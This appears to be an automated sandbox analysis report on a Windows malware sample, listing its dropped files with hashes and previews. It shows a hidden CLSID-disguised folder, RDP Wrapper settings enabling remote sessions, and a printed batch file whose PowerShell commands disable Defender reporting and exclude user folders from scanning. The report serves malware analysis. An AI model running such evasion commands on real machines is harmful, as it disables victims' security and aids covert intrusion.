                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1062106
                  Entropy (8bit):5.3232281164513955
                  Encrypted:false
                  SSDEEP:192:A+NOT6PPPIPPPPIPPPPPPPPPPPPPPPPPPPPPPPPPPPPPIJJPPPPPPPJPIJdJPJIk:ZNOTA
                  MD5:449D3411E002AF4231CB160844F0CA3F
                  SHA1:91B941278699C6D5AEBBBA7B1A62B743510504D0
                  SHA-256:F171EC6418D9A9117071186E2D08F2B97C8B3B7D111E372E5CACF349E0D47EE6
                  SHA-512:E650F4C41B5E766D39D40782CA71C59385001D4AE15B8E049BC4A37CB0E7344C2E6011AB584F03CC6F99FC7809B9FE864288A06B2409347EF69EA5A810D8BC9C
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b919

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\referrer

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):2.0
                  Encrypted:false
                  SSDEEP:3:9:9
                  MD5:006F29D8E822B9241020AEC2495EF819
                  SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                  SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                  SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                  Malicious:false
                  Preview:wgNj

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):37376
                  Entropy (8bit):5.7181012847214445
                  Encrypted:false
                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):115712
                  Entropy (8bit):6.25860377459178
                  Encrypted:false
                  SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                  MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                  SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                  SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                  SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):3038844
                  Entropy (8bit):5.281771188349672
                  Encrypted:false
                  SSDEEP:192:ARNOTdvvvuvvvvuvvvvvvvvvvvvvvvvvvvvvvvvvvvvRRvvvvvvRuFRvRuvvvvvq:uNOTe
                  MD5:236BD9B611F1CB855E04C697830FE0B4
                  SHA1:338148E7158BCA129C495A728804AB1D90BB92B0
                  SHA-256:D5AD543BE783E25DF72CA9795DEB27B82081DE5DF1105B619F766BE24E09C489
                  SHA-512:50F8644B95D83521B97B2B69696D3984A9EEDF9A18127A3330487B487BB1C04CA966FF411A7AC965D51B14E7B21DE7CA9513E8095A9C98187D42A57216B0DAD1
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b915e342)..[I] (tcp_connect) -

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):91136
                  Entropy (8bit):6.2041507656664825
                  Encrypted:false
                  SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                  MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                  SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                  SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                  SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:Generic INItialization configuration [SLPolicy]
                  Category:dropped
                  Size (bytes):456534
                  Entropy (8bit):5.450314708570292
                  Encrypted:false
                  SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                  MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                  SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                  SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                  SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                  Malicious:false
                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):10480965
                  Entropy (8bit):6.710750822103746
                  Encrypted:false
                  SSDEEP:196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
                  MD5:458F2D710689EA3CF61D5CD97C6B2470
                  SHA1:BA71901A29F77715A3DC952578F6D249B944FE26
                  SHA-256:47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
                  SHA-512:C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
                  Malicious:false
                  Preview:.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Preview:@...e...........................................................

                  C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat

                  Download File
                  Process:C:\Users\user\Desktop\ET5.exe
                  File Type:DOS batch file, ASCII text
                  Category:dropped
                  Size (bytes):259
                  Entropy (8bit):4.933902901538645
                  Encrypted:false
                  SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                  MD5:261A842203ADB67547C83DE132C7A076
                  SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                  SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                  SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                  Malicious:true
                  Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04okgsea.x3o.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tspmt20.ux5.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbpbwt2k.n13.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gq1aspet.ocq.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5xy5n0h.5xx.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5ak4gvi.uzv.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krmoreh2.3zm.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lozymzqf.hla.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p55g31kr.r4k.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sle5cxcd.beq.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuplvhgo.odt.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbhu2a30.ba4.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe

                  Download File
                  Process:C:\Users\user\Desktop\ET5.exe
                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):98304
                  Entropy (8bit):6.298274541598319
                  Encrypted:false
                  SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                  MD5:319865D78CC8DF6270E27521B8182BFF
                  SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                  SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                  SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 67%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................|..............@....reloc...............~..............@..B................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\installer.log

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):3745
                  Entropy (8bit):5.502436715800604
                  Encrypted:false
                  SSDEEP:96:i68J9VqODT0HU0Hn0H1EO0He0H+kQHR36kPiOdW0HMVVHaHn0HMttHMn:/OTTT000H0eO0+0TQxKkPiOdW0AV6H0n
                  MD5:E53F3A65C3D602EA6ACA952C2ADBBE4B
                  SHA1:5755BFA1B01A1FF207571322444C19647D883352
                  SHA-256:477900E1267F2CE42E8AE0FFB527F8B92A5B81FDD6E935987CD81686CCE5FE36
                  SHA-512:8827632E198D96AC110A6453D41D6427596FB1BDEFD0A39B362F161009F5E4F968A494CF529D33CFCEA8C198A607F659A65A38BAF18F799350B5C44022BDD144
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1

                  C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe

                  Download File
                  Process:C:\Users\user\Desktop\ET5.exe
                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
